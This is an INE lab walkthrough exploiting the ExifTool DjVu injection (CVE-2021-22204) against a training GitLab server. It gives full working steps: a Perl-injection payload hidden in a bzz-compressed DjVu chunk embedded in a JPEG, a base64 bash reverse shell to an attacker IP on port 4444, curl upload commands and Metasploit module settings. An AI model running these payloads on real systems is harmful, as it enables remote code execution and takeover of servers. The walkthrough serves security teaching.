ExifTool Command Injection (CVE-2021-22204)
In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
Purpose: We are learning how to manually exploit the Gitlab server running the ExifTool vulnerable version to better understand the vulnerability. Also, we will use Metasploit Framework to generate a malicious image that gives us a meterpreter session.
Technical difficulty: Beginner
Introduction
In 2021, a critical vulnerability was found in the ExifTool tool. The ExifTool is used in many significant applications such as Gitlab. Gitlab uses this tool as a dependency for their product. One issue in the Gitlab lab was exploited due to a vulnerability found in the ExifTool tool. Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image. Many python scripts and a Metasploit module are available to generate the malicious image file.
The vulnerability severity base score is 7.8.
In this lab, we targeted the Gitlab server, where the git server was not correctly validating image files passed to a file parser, resulting in remote command execution.
The CVE assigned to this vulnerability is CVE-2021-22204.
Lab Environment
In this lab environment, the user will access a Kali GUI instance. A vulnerable machine GitLab server deployed on http://demo.ine.local.
Goal after completing this scenario: Exploit the Gitlab server using a malicious .jpg image and gain the shell. Then read the flag.
Tools
The best tools for this lab are:
- Nmap
- Bash Shell
- ExifTool
- Metasploit Framework
Please go ahead ONLY if you have COMPLETED the lab or you are stuck! Checking the solutions before actually trying the concepts and techniques you studied in the course will dramatically reduce the benefits of a hands-on lab!
What is GitLab?
GitLab Community Edition (CE) is an open-source end-to-end software development platform with built-in version control, issue tracking, code review, CI/CD, and more. Self-host GitLab CE on your own servers, in a container, or on a cloud provider.
On April 14, 2021, GitLab published a security release to address CVE-2021-22205, a critical remote code execution vulnerability in the service's web interface. At the time, GitLab described the issue as an authenticated vulnerability that was the result of passing user-provided images to the service's embedded version of ExifTool. A remote attacker could execute arbitrary commands as the git user due to ExifTool's mishandling of DjVu files, an issue that was later assigned CVE-2021-22204.
In this lab, we are focused on exploiting CVE-2021-22204
Affected products
GitLab's April 2021 advisory affects all versions of both GitLab Enterprise Edition (EE) and GitLab Community Edition (CE) starting from 11.9. The vulnerability was patched in the following versions:
- 13.10.3
- 13.9.6
- 13.8.8
Source: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed
What is ExifTool?
ExifTool is a free and open-source software program for reading, writing, and manipulating image, audio, video, and PDF metadata. It is platform-independent, available as both a Perl library (Image::ExifTool) and command-line application. ExifTool is commonly incorporated into different types of digital workflows and supports many types of metadata including Exif, IPTC, XMP, JFIF, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP and ID3, as well as the manufacturer-specific metadata formats of many digital cameras.
Source: https://en.wikipedia.org/wiki/ExifTool
What is Djvu?
Djvu is a computer file format designed primarily to store scanned documents, especially those containing a combination of text, line drawings, indexed color images, and photographs. It uses technologies such as image layer separation of text and background/images, progressive loading, arithmetic coding, and lossy compression for bitonal (monochrome) images. This allows high-quality, readable images to be stored in a minimum of space, so that they can be made available on the web.
Source: https://en.wikipedia.org/wiki/DjVu
For vulnerability analysis, we highly recommend you to please refer to this blog post written by [convisoappsec](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/)
Solution
Step 1: Open the lab link to access the Kali machine.
Kali machine
Step 2: Check if the provided machine/domain is reachable.
Command
ping -c 4 demo.ine.local
The provided machine is reachable, and we also found the target's IP address.
Step 3: Check all open ports on the machine.
Command
nmap demo.ine.local
Multiple ports are open. The GitLab server is running on port 80.
Step 4: Run the firefox browser and access port 80 to identify the GitLab server.
URL: http://demo.ine.loca
The target is running the Gitlab server.
Exploiting Manually
Step 5:
We will manually exploit the vulnerability by generating the malicious .jpg image.
To trigger the vulnerable function, we need to create a valid DjVu file that contains an annotation chunk with the payload that will be executed by the eval function as Perl code. To create this valid DjVu file, we used the tool djvumake , from the [djvulibre](http://djvu.sourceforge.net/) toolkit. A toolkit for DjVu file manipulation. We will also use the tool bzz to compress our payload, then it will not be easily visible in the DjVu file. (in case someone try to inspect it)
Source: https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
We will generate a malicious .jpg file on the Kali machine. A vulnerable ExifTool application is installed on the Kali machine to understand how the exploit/vulnerability is working.
First, we will try on the Kali machine; then, we will exploit Gitlab, which is using a vulnerable version of ExifTool.
Create a payload file with the below content in it.
Payload: (metadata "\c${system('id')};")
Commands:
nano payload
cat payload
Compress the payload file to make it non-human-readable
Command:
bzz payload payload.bzz
Making .djvu file using djvumake utility.
Command:
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
file exploit.djvu
INFO = Anything in the format 'N,N' where N is a number
BGjp = Expects a JPEG image, but we can use /dev/null to use nothing as a background image
ANTz = Will write the compressed annotation chunk with the input file
We have successfully generated the malicious .djvu file that will execute id command when someone tries to analyze it with the ExifTool tool.
We are running ExifTool to check the malicious file behavior.
Command:
exiftool exploit.djvu
As we can notice, we have successfully executed the command id while analyzing the exploit.djvu file using the ExifTool tool. This confirms that ExifTool version 12.23 is vulnerable to Command Injection vulnerability.
Step 6: Let's exploit the GitLab server.
We will again generate another malicious .djvu file. But, this time, we are exploiting the Gitlab server. It doesn't support .djvu format file. We need an image file.
We can easily create a .djvu file to .jgp using the below config file.
%Image::ExifTool::UserDefined = (
All EXIF tags are added to the Main table, and WriteGroup is used to
specify where the tag is written (default is ExifIFD if not specified):
'Image::ExifTool::Exif::Main' => {
Example 1. EXIF:NewEXIFTag
0xc51b => {
Name => 'HasselbladExif',
Writable => 'string',
WriteGroup => 'IFD0',
},
add more user-defined EXIF tags here...
},
);
1; #end%What this file does is make it possible for us to write a new tag on the file with the name HasselbladExif and the bytes 0xc51b to identify it inside our new file. Then we can insert it inside of any file. Then use it and our already made exploit.djvu to insert the malicious DjVu file inside a valid JPEG: https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
Generating a new .djvu file with Bash reverse shell in it.
First, let's check the attacker's machine IP address.
Command:
ip addr
The attacker machine IP address is: 10.10.27.3.
Note: In your case, please remember to change the attacker machine IP address
Bash Reverse Shell: sh -i >& /dev/tcp/10.10.27.3/4444 0>&1
First, encode the shell in base64 format.
Command:
echo 'sh -i >& /dev/tcp/10.10.27.3/4444 0>&1' | base64
Payload: (metadata "\c${system('echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMjcuMy80NDQ0IDA+JjEK | base64 -d | bash')};")
Command:
nano payload
cat payload
bzz payload payload.bzz
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
file exploit.djvu
Now, converting the .djvu file into .jgp
Command:
cat configfile
cp /usr/share/wallpaper.jpg .
exiftool -config configfile '-HasselbladExif<=exploit.djvu' wallpaper.jpg
configfile = The name of our configuration file;
-HasselbladExif = Tag name that are specified in the config file;
exploit.djvu = Our exploit, previously made with djvumake;
wallpaper.jpg = A valid JPEG file;
Start the netcat listener on port 4444
Command:
nc -lvp 4444
Send the payload to gain the bash shell.
Command:
curl -v -F 'file=@/root/wallpaper.jpg' http://demo.ine.local/$(openssl rand -hex 8)
We have received a shell.
Source: https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
Exploiting Using Metasploit
Step 7: Metasploit module is available to generate the malicious image. Use the module to generate the malicious image and exploit the Gitlab server manually using curl.
Start the Metasploit framework and search for the ExifTool exploit module.
Command:
msfconsole -q
search exiftool
There is a metasploit module available: exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
ExifTool DjVu ANT Perl injection
This module exploits a Perl injection vulnerability in the DjVu ANT parsing code of ExifTool versions 7.44 through 12.23 inclusive. The injection is used to execute a shell command using Perl backticks. The DjVu image can be embedded in a wrapper image using the HasselbladExif EXIF field.
Source: https://www.rapid7.com/db/modules/exploit/unix/fileformat/exiftool_djvu_ant_perl_injection/
For more understanding about the ExifTool CVE-2021-22204 - Arbitrary Code Execution: Here is an excellent blog post by [William Bowling](https://twitter.com/wcbowling): https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
Use the exiftool_djvu_ant_perl_injection exploit module and check all available options.
Commands:
use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
show options
All the options are already set. Start the Metasploit handler while generating the malicious image.
Set DISABLEPAYLOADHANDLER to false, set WfsDelay to 100, and then run the module.
Check the file details.
Commands:
set PAYLOAD cmd/unix/reverse_bash
set DISABLEPAYLOADHANDLER false
set WfsDelay 100
exploit
The image is generated in the /root/.msf4/local/msf.jpg. It's a JPEG image data with Exif standard.
Note: Make sure that your Metasploit handler is running
Send the payload to gain the meterpreter session.
Command:
curl -v -F 'file=@/root/.msf4/local/msf.jpg' http://demo.ine.local/$(openssl rand -hex 8)
Received the meterpreter session.
Successfully exploited the target machine.
Step 8: Read the flag.
Commands:
cd ..
ls
cat flag.txt
FLAG: 7e9b2ed1272331cfbd2aac2e5eb3f84b
Conclusion:
We have successfully exploited the Gitlab server abusing exiftool’s vulnerability (ExifTool’s mishandling of DjVu files) that allows an attacker to perform a command injection using a malicious image. Gitlab was not correctly validating image files that were passed to a file parser; hence, it is possible to exploit the vulnerability.
References
Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
